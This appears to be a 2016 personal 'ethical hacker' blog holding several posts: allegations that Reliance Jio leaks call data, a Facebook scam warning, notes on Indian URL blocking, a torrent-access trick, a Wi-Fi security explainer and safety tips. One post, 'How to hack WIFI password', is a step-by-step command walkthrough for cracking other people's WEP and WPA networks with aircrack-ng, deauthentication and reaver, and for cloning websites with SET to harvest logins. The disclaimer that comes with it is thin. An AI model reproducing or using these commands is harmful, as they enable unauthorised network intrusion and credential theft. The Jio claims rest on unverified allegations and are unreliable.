Monday, October 24, 2016

Stop using Reliance JIO right now

Reliance Jio got 16 Million customer within 26 days and getting nearly 1.1 million new customer daily, Jio is supplying 16000 Tera bytes of data everyday which is the highest amount of data Supplied by a service provider, where vodafone supplies 6000 Tera Bytes of data and China mobiles supply 12000 TB of data Daily, how can a service provider supply this large amount of data daily for free? Try to understand something is terribly wrong


As per Anonymous India (@readteamin):
  Reliance Jio is sharing call data with advertisers. After the commercial launch of Jio services on 5 September, this accusation will add to the woes of the newest network provider in the market.
Last year, Anonymous India wrote a blog post citing security flaws in the Reliance Jio chat app. The post claims that the company used no encryption to transfer messages, so it was vulnerable to attacks from hackers. 
The latest revelation by Anonymous India suggests that call data from Jio apps are going to servers situated in USA and Singapore. Additionally, the data is being shared with an advertiser called Mad-Me





On its website, Anonymous also provided a step outline of how call data can be diverted to the advertiser.
1. Download and install Burp Suite (free edition) which is a security monitoring tool for applications.
2. Configure your Android device to send the traffic via Burp Suite.
3. Download My Jio app and the Jio dialer application from Google Play store.
4. Start capturing and keep intercept off.
5. Go to My Jio app and let it update.
6. Go to home and use native dialer to make calls.
7. Calling data is sent on random interval to app.cobal.mad-me.com from mobile, for fast result close all apps and open native dialer again.
8. You will get the packet being sent in proxy history.
After the launch, Jio is confronting a scarcity of SIMs because of high demand. Often, there are long lines outside Reliance digital stores. Reliance is also facing strong resistance from other telcos in giving it adequate interconnection points for calls.
Currently, Jio customers are experiencing heavy call-drops. On an average, the Jio network is seeing almost 12 crore call drops to other networks every day.
I, Agnidhra Chakraborty, as an Ethical Hacker and a citizen of India request you to stop using JIO sims for the safety of youself and your country. Keep it in your mind that these informations can be sold in deepweb against a large amount of Bitcoins, and I think Deepweb is not a perfect place where your private informations should be.

#OpStopReliance
This content is not purely original and does not bear any kind of copyright
THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.
                                                                        Email:agnidhrashim@gmail.com
                                                                       Call me : 9735689898

Tuesday, September 20, 2016

Beware of this facebook virus

Since many days I have been watching there is a video link of some individual in facebook which is tagged by some of their friends saying this is your video and this is some kind of spoof runs on an individual's facebook profile, never open that link and this is a virus generated by hackers and this uses the individual's profile picture that looks damn legitimate If you click that video, your contacts on Facebook are automatically scanned by the virus and it automatically sends a similar link to all your friends on Facebook.
This is like a chain video and it will grip anyone and everyone who clicks the video.
If something similar has happened to you, immediately alert all your friends or contacts on Facebook to not open the video. This way you can stop spreading the virus further.
How to identify the virus?
The video generally comes in this file format : http://rigvtl1f.latestnewstodays.com
It uses your pic, profile pic, etc
It tags your friends automatically
Immediately alert your friends if you see such video being posted from your timeline
How to get rid of it if you have already opened it?
Go to your activity log and delete all these posts
Remove all the suspicious apps from your Facebook profile
Clear your browser, cache and cookeis and get rid of all malicious history
Check your Desktop for any virus and scan it through your antivirus

Monday, August 22, 2016

Fake Report

If you were to believe the recent reports, you might have landed in jail for visiting a banned website or downloading a torrent. Actually, the jail sentence and the penalty of $4,500 was for a specific case for a recently released Bolloywood movie, Dishoom.
Recent media reports that one could now get three-year jail sentence as well as a fine of $4,500 for trying to visit URLs blocked by the Indian government spread like wildfire creating frenzy among the people in India in the last 24 hours.
However, there is something you should know the next time you use a proxy site or a VPN (virtual private network) to open a torrent site.
“Visiting any website, even if it is a blocked site is not illegal either under the provisions of the Copyright Act, 1957 or the Information Technology Act, 2000,” says Prasanth Sugathan, Counsel at the Software Freedom Law Centre India, a registered society that works on the intersections of law and technology. “The only exception could be if a person views child pornography.”
“Torrent sites are often used to share free and open source software and literary and artistic work licensed under Creative Commons licenses,” Sugathan adds.
So, what are the actual details that prompted the reports to float around? The issue is likely due to the John Doe orders that Indian courts are issuing at regular intervals at the request of content creators like Bollywood film makers. The lawyers of film studios often approach courts ahead of a movie’s release seeking preventive blocks on the URLs they compile in the list. IP law publication SpicyIP reported about an order from the Mumbai High Court four days ago while dealing with an anti-piracy application on behalf of the newly-released film Dishoom.
The court ruled in the case that ISPs (internet service providers) should deliver a special message with information about the provisions of the Copyright Act, along with the order in question and the suit number, instead of just displaying the standard message that says the website is being blocked.
As a result of this special message, the people would be aware as to why a page was being blocked. However, this gave rise to question that if pages are being extensively blocked because a movie studio wants to do so, then shouldn’t the people be provided the reason for the block?
To which, Tata responded to the court order saying that individually putting up special information for all the websites blocked is not technologically possible for them. As a result, the court allowed for a special compromise by providing the text that has been going viral across the internet in the last few hours. However, the below message are only seen by users of Tata’s service, which also explains why none of the other ISPs are displaying this message.
“This URL has been blocked under the instructions of the Competent Government Authority or in compliance with the orders of a Court of competent jurisdiction. Viewing, downloading, exhibiting or duplicating an illicit copy of the contents under this URL is punishable as an offence under the laws of India, including but not limited to under Sections 63, 63-A, 65 and 65-A of the Copyright Act, 1957 which prescribe imprisonment for 3 years and also fine of upto Rs. 3,00,000/-. Any person aggrieved by any such blocking of this URL may contact at urlblock@tatacommunications.com who will, within 48 hours, provide you the details of relevant proceedings under which you can approach the relevant High Court or Authority for redressal of your grievance.”
To put in context, the message displayed above talks simply of illegal viewing of the copyrighted materials. Opening or browsing a pirate website will not send you to jail other than some sneaky malwares infecting your system. Having said that, could illegally downloading content land you in jail? Yes, most definitely, as per the Copyright Act about piracy which has been around for a long time now, but has rarely been enforced.
THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.

- AgnidhraChakraborty©
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email:agnidhrashim@gmail.com
                                                                       Call me : 9735689898

Sunday, August 7, 2016

How to access TORRENTZ.EU, KAT.CR and other blocked torrent sites

For some people the title of this is quite exciting, and for some it is not, ok so let's jump into the topic, one of the most popular meta search engine torrentz has bade goodbye to his millions of user, It was founded in 2003 and served us for 13 years, but unexpectedly on 5/08/2016 it shut down unexpectedly, saying an emotional goodbye message "Torrentz will always love you. Farewell."


This is too much painful for torrent lovers but you know what, you don't have to take any kind of stress while I am here, so you wanna know how you can open torrentz again and download stuffs from it, ok in this blog I, Agnidhra Chakraborty shall describe how anyone can access TORRENTZ.EU step by step.

So, Let's start

First of all TORRENTZ is closed, so what you have to do is go back to the past and search your torrent, yes you have to time travel, now you may think that I have gone crazy but I have not, you can go, every webpage in the internet has a cached version of it, let's assume you want to visit a website on a specific date, so you have to search for the cached page of that site, there is an awesome tool available in the internet, it is called WAYBACKMACHINE and you can check out any site for it's old version just like torrentz.eu http://archive.org/web/ is the link where you can write an URL in the box provided and search for that

As you can see there are lots of sky blue bubbles in the calendar, now you have to click any of these available bubbles like I have clicked on 9th of july, so let's see what happens here, 
So, this is the torrentz cached page from 9th of july, now I am gonna search a torrent here and show you what happens
Here I have searched for 8 mile and you can see the results are here in front of your eye now I will click on one of those links to see what happens

As you can see it has redirected me to the torrent download site's page and you can download any torrent from here and as all of us know that KAT.CR is also banned I am going to download the torrent from KAT.CR itself, and here it is


And as you can see I am now easily able to download any torrent from any site no matter it is active or not but unfortunately we may not get future or latest torrents from here but it is useful for any purpose

IN INDIA, DOWNLOADING TORRENT IS ILLEGAL AND I DON'T PROVOKE ANYONE TO DOWNLOAD TORRENT FROM ANY SITE AS OUR HONORABLE SUPREME COURT HAS BANNED THIS SITE, THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.

THIS CONTENT IS NOT MEANT TO COPY ©, THIS IS MY RESEARCH WORK SO SUPPORT ME, DON'T STEAL MY IDEAS

                                                                                                                      - AgnidhraChakraborty©
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898




Monday, July 25, 2016

How to hack WIFI password

In the previous blog I described some DO's and DONT's and today I am gonna show you how to crack a WIFI password, but do not try this if you are not an Ethical Hacker or a Cyber Security Expert, this is illigal to hack into someone's WIFI and I am not responsible if anything goes wrong with you while doing this.

So. let's start:



You need some basic concept about computer and have a Linux Operating System for the work, Kali linux, Caine linux, Backbox, Deft linux, KNOPPIX, Parrot Security OS, Pentoo, WIFI sslax and WIFI way gets the work done but I personally prefer to use Kali Linux
-------------------------------------------------------------------------------
WEP
-------------------------------------------------------------------------------
open command terminal

airmon-ng start wlan0 (press enter after each line)

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

copy numbers to the left and make note of the channel #

airodump-ng -w derp -c (channel number here) --bssid (copied number here) mon0

open new terminal window

aireplay-ng -1 0 -a (copied number here) mon0

open new terminal window

aireplay-ng -3 -b (copied number here) mon0

wait for 10 minutes

open new terminal window

aircrack-ng derp-01.cap
-----------------------------------------------------------------------------
WPA/WPA2 version 1
-----------------------------------------------------------------------------

apt-get update

apt-get install reaver

airmon-ng start wlan0

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

reaver -i mon0 -b (copied number here) -vv
-----------------------------------------------------------------------------
WPA/WPA2 version 2
-----------------------------------------------------------------------------
open folder containing darkc0de.lst - copy and paste to the 

open command terminal

airmon-ng start wlan0 

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

copy numbers to the left and make note of the channel # and essid (name on right)

airodump-ng -w -c (channel number here) -w herp --bssid (copied number here) --ivs mon0

open new terminal window

aireplay-ng -0 1 -e (essid name here) mon01

once you have handshake

open new terminal window

aircrack-ng -w /root/Desktop/darkc0de.lst herp-01.ivs
-----------------------------------------------------------------------------
get usernames and passwords
-----------------------------------------------------------------------------

open terminal

cd /pentest/exploits/set

./set

type in whatever website you want to clone

Even you can use WIFITE in terminal or fern wifi cracker or various wifi hacking tools available in Kali Linux,

Stay safe and again DO NOT TRY THESE TOOLS IF YOU ARE NOT A PROFESSIONAL

EDUCATION PURPOSES ONLY

                                                                                                                     - AgnidhraChakraborty
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898

Friday, July 22, 2016

Some DO's And DONT's

So in the previous blog I described how to stay safe while using a WIFI router and today before starting another topic I will describe you how hackers can hack into your personal data and steal those and I will describe some Do's and Dont's in this blog.

Let's start:

1. Think before you click: Sometimes all of us face some problems while surfing internet, the problem is annoying advertisements. Those advertisements say that "Congratulations, you have won an iPhone 6S Gold, claim your reward here" or "Check this deal out, Samsung Galaxy S7 @ Rs.1 only for you, click here to know more." and I suggest you to never click that even if you find that much more tantalizing than anything, even sometimes you get an E mail from a reputated company like Cocacola or BMW saying that you have won a promo or a lottery amounting 1000000000 great Britain pound and to claim the reward please submit your Name, Age, Date of Birth along with your Bank Account Details and even your ATM pin or CVV, never bother to reveal your bank details or even any of your personal details to them, they are not from Cocacola or BMW, they are frauds who are trying to take all your money away and convert them to bitcoins and even you cannot realize that you are being a loser. Those mails are called Spamwares, even sometimes they contain a trojan like "Netbus" or something that can cause some serious issues. Or even worse can happen, you have to pay some ransom to the hackers to gain access to your own personal files, yes it is true, the malwares called ransomwares, so never click on a link without thinking what can happen in future.


This is the example of a phising E-Mail sent to me from some hackers

2.Beware of Fake Websites: Sometimes you may fall in a trap set by hackers, phissing sites, these sites are very similar to the original site but these contain some grammatical errors, low resolution images and even the url of these sites are quite different to the original website. So before logging into a website always check the URL for spelling mistakes or grammatical errors.

3.Install a Firewall: Though Microsoft provides a free firewall for Windows you should download an external firewall and I prefer Zone Alarm for that purpose, it is a lightweight free and secure firewall.

4.Online shopping and Online payment: Don’t shop on a site unless it has the “https” and a padlock icon to the left or right of the URL. Also, protect yourself and use a credit card instead of a debit card while shopping online—a credit card company is more likely to reimburse you for fraudulent charges.
Use a card of such bank which will ask for OTP and send you the SMS of the transaction along with the amount and the recipient's details.

5.Final precautions: Never use a cracked software, never use Torrent for downloading and use a genuine version of your operating system ams never use KMS pico, Remove wat and such softwares for activation and finally keep all your softwares Drivers, antivirus and Operating System updated to it's latest version.


Sunday, July 17, 2016

How to stay safe while using a WIFI router

How to stay safe while using a WIFI router:

Okay so let's start with another one. In the previous blog I described how to stay safe online or even in real life, sometimes we have to deal with some bullies or some really messed up facts so we should be always prepared for that and stay safe. Anyways couple of days ago on 14/07/2016 I had to visit one of my friend's named Gizmotech Solutions as it was the opening of his shop and there I was invited along with my best friend Subhendu Sekhar Biswas and I was late and Subhendu was already there, anyays as soon as I reached there and opened the door everyone was looking at me and I had to face an unexpected challenge. I came in and Subhendu told me "Hack the wifi"with a poker face pointing at a WIFI router on the table , everyone there except Subham and Subhendu was smiling at me and I can bet that they were thinking "Who the hell is he who can hack a damn wifi with a firewall enabled router?" Some people think that Hackers are the magicians who can hack anything in the world, but no, we are human, we have some special kind of knowledge and tools in our hand which we aquire  doing too much hard works. Anyways I accepted the challenge and started to hack the wifi, the router had a WPA2 enabled security and I had to use a special kind of tool to crack that security and then I had only my smartphone with me, then my evil side came out and I tried to cheat everyone by using WPS PUSH BUTTON, but Subham detected that said "Really, are you using WPS PUSH BUTTON?" Then he again changed the router password, this time I had to deal with a deep shit, and even I could not memorize the command required for the job, finally I succeeded to crack into the network. I know you are excited to know about the tools and tricks we use to hack and I will describe them as long as you stay with me. You can reach upto me at http://agnidhrashim.wix.com/ethical-hacker or call me(9735689898) or send an E Mail (agnidhrashim@gmail.com) for more details.

Now let's jump into the main content

Today I will tell you about various kinds of WIFI security,

When you buy a brand new router and set up it with your own bradband setting you probably have noticed some acronyms (WEP, WPA+TKIP, WPA+TKIP/AES or WPA2+AES)when you set a strong password for your router thinking that no one can crack that password now, but at the end of the month when your bill comes to your house it seems too much crazy and even you cannot afford or carry too much bill. Or even worse can happen, It is a very good morning, you woke up and now you are gonna have some coffee and suddenly someone knocks at your door, you open the door and see some police inspectors are outside and they have an arrest warrant against you because maybe someone has hacked into your WIFI has done some illigal job and you don't even have a clue of what happened, no excuses, no shit, cause police don't give a damn, they will catch you beat the hell out of you and then you have to prove yourself innocent and let them set you free,that's why I always say you, stay safe while doing some stuff, Just for ignoring the acronym any one can mess up your life, so what acronym should you choose, don't worry, I am going to clarify that now.

Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy (WEP) is the most widely used Wi-Fi security algorithm in the world. This is a function of age, backwards compatibility, and the fact that it appears first in the encryption type selection menus in many router control panels.

WEP was certified as a Wi-Fi security standard in September of 1999. The first versions of WEP weren’t particularly strong, even for the time they were released, because U.S. restrictions on the export of various cryptographic technology led to manufacturers restricting their devices to only 64-bit encryption. When the restrictions were lifted, it was increased to 128-bit. Despite the introduction of 256-bit WEP encryption, 128-bit remains one of the most common implementations.
Despite revisions to the algorithm and an increased key size, over time numerous security flaws were discovered in the WEP standard and, as computing power increased, it became easier and easier to exploit them. As early as 2001 proof-of-concept exploits were floating around and by 2005 the FBI gave a public demonstration (in an effort to increase awareness of WEP’s weaknesses) where they cracked WEP passwords in minutes using freely available software.
Despite various improvements, work-arounds, and other attempts to shore up the WEP system, it remains highly vulnerable and systems that rely on WEP should be upgraded or, if security upgrades are not an option, replaced. The Wi-Fi Alliance officially retired WEP in 2004.

Wi-Fi Protected Access (WPA)

Wi-Fi Protected Access was the Wi-Fi Alliance’s direct response and replacement to the increasingly apparent vulnerabilities of the WEP standard. It was formally adopted in 2003, a year before WEP was officially retired. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-bit keys used in the WEP system.
Some of the significant changes implemented with WPA included message integrity checks (to determine if an attacker had captured or altered packets passed between the access point and client) and the Temporal Key Integrity Protocol (TKIP). TKIP employs a per-packet key system that was radically more secure than fixed key used in the WEP system. TKIP was later superseded by Advanced Encryption Standard (AES).
Despite what a significant improvement WPA was over WEP, the ghost of WEP haunted WPA. TKIP, a core component of WPA,  was designed to be easily rolled out via firmware upgrades onto existing WEP-enabled devices. As such it had to recycle certain elements used in the WEP system which, ultimately, were also exploited.
WPA, like its predecessor WEP, has been shown via both proof-of-concept and applied public demonstrations to be vulnerable to intrusion. Interestingly the process by which WPA is usually breached is not a direct attack on the WPA algorithm (although such attacks have been successfully demonstrated) but by attacks on a supplementary system that was rolled out with WPA, Wi-Fi Protected Setup (WPS), designed to make it easy to link devices to modern access points.

Wi-Fi Protected Access II (WPA2):

WPA has, as of 2006, been officially superseded by WPA2. One of the most significant changes between WPA and WPA2 was the mandatory use of AES algorithms and the introduction of CCMP (Counter Cipher Mode with Block Chaining Message Authentication Code Protocol) as a replacement for TKIP (still preserved in WPA2 as a fallback system and for interoperability with WPA).
Currently, the primary security vulnerability to the actual WPA2 system is an obscure one (and requires the attacker to already have access to the secured Wi-Fi network in order to gain access to certain keys and then perpetuate an attack against other devices on the network). As such, the security implications of the known WPA2 vulnerabilities are limited almost entirely to enterprise level networks and deserve little to no practical consideration in regard to home network security.
Unfortunately, the same vulnerability that is the biggest hole in the WPA armor, the attack vector through the Wi-Fi Protected Setup (WPS), remains in modern WPA2-capable access points. Although breaking into a WPA/WPA2 secured network using this vulnerability requires anywhere from 2-14 hours of sustained effort with a modern computer, it is still a legitimate security concern and WPS should be disabled (and, if possible, the firmware of the access point should be flashed to a distribution that doesn’t even support WPS so the attack vector is entirely removed).
  • TKIP—Temporal Key Integrity Protocol. The replacement encryption system for WEP. Several features were added to make keys more secure than they were under WEP.
  • AES—Advanced Encryption Standard. This is now the preferred encryption method, replacing the old TKIP. AES is implemented in WPA2/802.11i.
  • Dynamic WEP (802.1x)—When the WEP key/pass phrase is entered by a key management service. WEP as such did not support dynamic keys until the advent of TKIP and CCMP.
  • EAP—Extensible Authentication Protocol. A standard authentication framework. EAP supplies common functions and a negotiation mechanism, but not a specific authentication method. Currently there are about 40 different methods implemented for EAP. See WPA Enterprise.
  • 802.1x, IEEE8021X—The IEEE family of standards for authentication on networks. In this context, the term is hopelessly ambiguous.
  • LEAP, 802.1x EAP (Cisco LEAP)—(Lightweight Extensible Authentication Protocol) A proprietary method of wireless LAN authentication developed by Cisco Systems. Supports dynamic WEP, RADIUS and frequent re authentication.
  • WPA-PSK, WPA-Preshared Key—Use of a shared key, meaning one manually set and manually managed. Does not scale with a large network either for manageability or security, but needs no external key management system.
  • RADIUS—Remote Authentication Dial In User Service. A very old protocol for centralizing authentication and authorization management. The RADIUS server acts as a remote service for these functions.
  • WPA Enterprise, WPA2 Enterprise—A trade name for a set of EAP types. Products certified as WPA Enterprise or WPA2 Enterprise will inter operate (EAP-TLS, EAP-TTLS/MSCHAPv2, PEAPv0/EAP-MSCHAPv2, PEAPv1/EAP-GTC & EAP-SIM)
  • WPA-Personal, WPA2-Personal—See Pre-Shared Key.
  • WPA2-Mixed—Support for both WPA1 and WPA2 on the same access point.
  • 802.11i—An IEEE standard specifying security mechanisms for 802.11 networks. 802.11i uses AES and includes improvements in key management, user authentication through 802.1X and data integrity of headers.
  • CCMP—Counter Mode with Cipher Block Chaining Message Authentication Code Protocol. An encryption protocol that uses AES.

Now all of us know everything about the WIFI security, but if you are lazy enough to read the whole document just select simply select WPA 2 and don't feel free that now no one can crack into your WIFI network, if possible just keep changing it every week. That's it for know, I will describe some other techniques later in my blogs
                                                                                                        - Agnidhra Chakraborty
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898